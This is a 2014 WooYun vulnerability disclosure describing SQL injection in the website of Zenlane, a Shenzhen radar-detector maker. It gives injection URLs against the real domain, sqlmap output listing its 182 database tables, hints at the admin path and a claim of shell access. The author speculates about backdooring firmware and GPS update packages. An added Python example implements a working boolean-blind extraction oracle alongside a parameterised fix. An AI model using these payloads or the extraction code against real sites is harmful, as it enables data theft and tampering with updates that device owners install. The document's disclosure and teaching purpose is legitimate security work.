
Vulnerability summary

Defect ID: wooyun-2014-082730

Title: SQL injection on the main website of a Shenzhen company (allows modification of the official safety-alert system, dashcam and GPS update data)

Vendor: 深圳善领科技有限公司

Author: wefgod

Submitted: 2014-11-10 09:56

Fix deadline: 2014-12-25 09:58

Published: 2014-12-25 09:58

Vulnerability type: SQL injection

Severity: High

Self-assessed rank: 15

Status: vendor could not be contacted, or vendor actively ignored the report

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2014-11-10: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed publicly
2014-12-25: Vendor has actively ignored the vulnerability; details disclosed to the public

Brief description:

Already got a shell.

Detailed description:

The affected site is the main website of 深圳善领科技有限公司; to avoid attracting the wrong kind of attention, the title is deliberately a little vague.
Zenlane's radar detectors get quite good reviews, and I recently bought one, then accidentally discovered... a serious problem on the official website. The site appears to be built on ThinkPHP.
And many official upgrade packages are published directly on the official site (no kidding, the update data for every product can be modified from the back end). What if someone planted a backdoor in them? What if someone used that to monitor, in real time, the location of every radar detector and dashcam they have sold?
Looks like surveillance techniques can evolve: all you need to do is give someone a radar detector~~

Proof of vulnerability:

Register an account first.
http://www.zenlane.com/index.php/Member/downinfo/id/127'%20and%20'1'='1

image001.png


http://www.zenlane.com/index.php/Member/downinfo/id/127'%20and%20'1'='2

image003.png


image005.png
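The two URLs above are a boolean-based blind test: the `'1'='1` variant returns the normal download page and the `'1'='2` variant does not, which shows that the single quote escapes a string literal inside the WHERE clause and that any condition appended there is evaluated by the database. The following Python is an added example, not code from the report or from Zenlane's site. It reproduces that query pattern against a constructed in-memory SQLite database (the real site ran MySQL; the table names h_download and h_user are borrowed from the sqlmap listing below, but their columns and contents are assumptions), turns the yes/no difference into the character-by-character extraction oracle that sqlmap automated here, and contrasts the vulnerable handler with a parameterised one.

```python
import sqlite3

# Constructed stand-in for the site's database. The real target ran MySQL
# behind a ThinkPHP app; the two table names are taken from the sqlmap
# listing in the report, but their columns and contents are assumptions.
def build_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE h_download (id INTEGER PRIMARY KEY, title TEXT)")
    con.execute("CREATE TABLE h_user (id INTEGER PRIMARY KEY, username TEXT)")
    con.executemany("INSERT INTO h_download VALUES (?, ?)",
                    [(126, "GPS data 2014-10"), (127, "DSA firmware 3.2")])
    con.execute("INSERT INTO h_user VALUES (1, 'admin')")
    return con

def downinfo_vulnerable(con, raw_id):
    """Assumed shape of the bug: the /id/<value> path segment is concatenated
    into a quoted WHERE clause, so a single quote escapes the literal."""
    sql = f"SELECT id, title FROM h_download WHERE id = '{raw_id}'"
    return con.execute(sql).fetchall()

def downinfo_fixed(con, raw_id):
    """Hardened version: reject anything that is not a plain integer and bind
    the value as a parameter so the driver never treats it as SQL."""
    if not raw_id.isdigit():
        return []
    return con.execute("SELECT id, title FROM h_download WHERE id = ?",
                       (int(raw_id),)).fetchall()

class BooleanOracle:
    """Turns the endpoint into a yes/no oracle: a row comes back only when the
    injected condition is true (the '1'='1 / '1'='2 test from the report)."""
    def __init__(self, con):
        self.con = con
        self.requests = 0

    def ask(self, condition):
        self.requests += 1
        # The application's own closing quote completes the final literal.
        payload = f"127' and ({condition}) and '1'='1"
        return len(downinfo_vulnerable(self.con, payload)) > 0

def blind_extract(oracle, subquery, max_len=64):
    """Recover the scalar result of `subquery` one character at a time with a
    binary search over printable ASCII (about 7 requests per character).
    SQLite's unicode() plays the role of MySQL's ascii()/ord()."""
    result = ""
    for pos in range(1, max_len + 1):
        if not oracle.ask(f"length(({subquery})) >= {pos}"):
            break                      # past the end of the string
        lo, hi = 32, 126               # printable ASCII range
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle.ask(f"unicode(substr(({subquery}),{pos},1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        result += chr(lo)
    return result

if __name__ == "__main__":
    db = build_db()
    print("true  condition:", downinfo_vulnerable(db, "127' and '1'='1"))
    print("false condition:", downinfo_vulnerable(db, "127' and '1'='2"))
    oracle = BooleanOracle(db)
    user = blind_extract(oracle, "select username from h_user limit 1")
    print("extracted:", user, "in", oracle.requests, "requests")
    print("fixed handler:", downinfo_fixed(db, "127' and '1'='1"),
          downinfo_fixed(db, "127"))
```

Against the constructed database the vulnerable handler returns the row for `127' and '1'='1` and nothing for `127' and '1'='2`, exactly the difference the two screenshots show, and the oracle recovers `admin` from h_user in a few dozen requests. The same loop pointed at `sqlite_master` enumerates table names, which is what sqlmap did against information_schema on the real MySQL back end. The fixed handler returns nothing for either payload and still serves id 127 normally.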


available databases [2]:
[*] information_schema
[*] www_zenlane_com
web application technology: Apache 2.4.2, PHP 5.3.15
back-end DBMS: MySQL 5.0.11
Database: www_zenlane_com
[182 tables]
+----------------------+
| cdb_access |
| cdb_activities |
| cdb_activityapplies |
| cdb_addons |
| cdb_adminactions |
| cdb_admincustom |
| cdb_admingroups |
| cdb_adminnotes |
| cdb_adminsessions |
| cdb_advertisements |
| cdb_announcements |
| cdb_attachmentfields |
| cdb_attachments |
| cdb_attachpaymentlog |
| cdb_attachtypes |
| cdb_banned |
| cdb_bbcodes |
| cdb_caches |
| cdb_creditslog |
| cdb_crons |
| cdb_debateposts |
| cdb_debates |
| cdb_failedlogins |
| cdb_faqs |
| cdb_favoriteforums |
| cdb_favorites |
| cdb_favoritethreads |
| cdb_feeds |
| cdb_forumfields |
| cdb_forumlinks |
| cdb_forumrecommend |
| cdb_forums |
| cdb_imagetypes |
| cdb_invites |
| cdb_itempool |
| cdb_magiclog |
| cdb_magicmarket |
| cdb_magics |
| cdb_medallog |
| cdb_medals |
| cdb_memberfields |
| cdb_membermagics |
| cdb_memberrecommend |
| cdb_members |
| cdb_memberspaces |
| cdb_moderators |
| cdb_modworks |
| cdb_myposts |
| cdb_mytasks |
| cdb_mythreads |
| cdb_navs |
| cdb_onlinelist |
| cdb_onlinetime |
| cdb_orders |
| cdb_paymentlog |
| cdb_pluginhooks |
| cdb_plugins |
| cdb_pluginvars |
| cdb_polloptions |
| cdb_polls |
| cdb_postposition |
| cdb_posts |
| cdb_profilefields |
| cdb_projects |
| cdb_promotions |
| cdb_prompt |
| cdb_promptmsgs |
| cdb_prompttype |
| cdb_ranks |
| cdb_ratelog |
| cdb_regips |
| cdb_relatedthreads |
| cdb_reportlog |
| cdb_request |
| cdb_rewardlog |
| cdb_rsscaches |
| cdb_searchindex |
| cdb_sessions |
| cdb_settings |
| cdb_smilies |
| cdb_spacecaches |
| cdb_stats |
| cdb_statvars |
| cdb_styles |
| cdb_stylevars |
| cdb_tags |
| cdb_tasks |
| cdb_taskvars |
| cdb_templates |
| cdb_threads |
| cdb_threadsmod |
| cdb_threadtags |
| cdb_threadtypes |
| cdb_tradecomments |
| cdb_tradelog |
| cdb_tradeoptionvars |
| cdb_trades |
| cdb_typemodels |
| cdb_typeoptions |
| cdb_typeoptionvars |
| cdb_typevars |
| cdb_usergroups |
| cdb_validating |
| cdb_warnings |
| cdb_words |
| h_about |
| h_access |
| h_activecode |
| h_activecode_backup |
| h_attach |
| h_audionavigation |
| h_backer |
| h_category |
| h_city |
| h_content |
| h_customer |
| h_dealers |
| h_dealers_old |
| h_download |
| h_downloaddata |
| h_dsa |
| h_ebook |
| h_email |
| h_feedback |
| h_freelog |
| h_freeuserdownload |
| h_gpsfile |
| h_gpstype |
| h_group |
| h_groupuser |
| h_information |
| h_jifen |
| h_jifen_log |
| h_job |
| h_license |
| h_licenseupload |
| h_links |
| h_member |
| h_news |
| h_news4 |
| h_node |
| h_notice |
| h_parament |
| h_policy |
| h_products |
| h_province |
| h_region |
| h_role |
| h_role_user |
| h_sales |
| h_service |
| h_servicewarn |
| h_sessions |
| h_setting |
| h_shop |
| h_shopcomment |
| h_shopimages |
| h_showshop |
| h_solution |
| h_supply |
| h_toppic |
| h_user |
| h_video |
| uc_admins |
| uc_applications |
| uc_badwords |
| uc_domains |
| uc_failedlogins |
| uc_feeds |
| uc_friends |
| uc_mailqueue |
| uc_memberfields |
| uc_members |
| uc_mergemembers |
| uc_newpm |
| uc_notelist |
| uc_pms |
| uc_protectedmembers |
| uc_settings |
| uc_sqlcache |
| uc_tags |
| uc_vars |
+----------------------+

image007.png


Add admin to the path; anyone who needs it will find it.

image009.png


image010.png


Upgrade data: could a backdoor be planted here? Not that I would know how to...

image012.png


There is also a dealer blacklist!

image014.png


It seems someone has visited before, but I don't know whether they succeeded.

image016.png


image017.png


And finally, by accident...

image019.png


Fix recommendation:

Well, there may be a lot of problems.

Copyright notice: when reposting, please credit the source wefgod@乌云


Vulnerability response

Vendor response:

The vendor could not be contacted, or the vendor actively refused.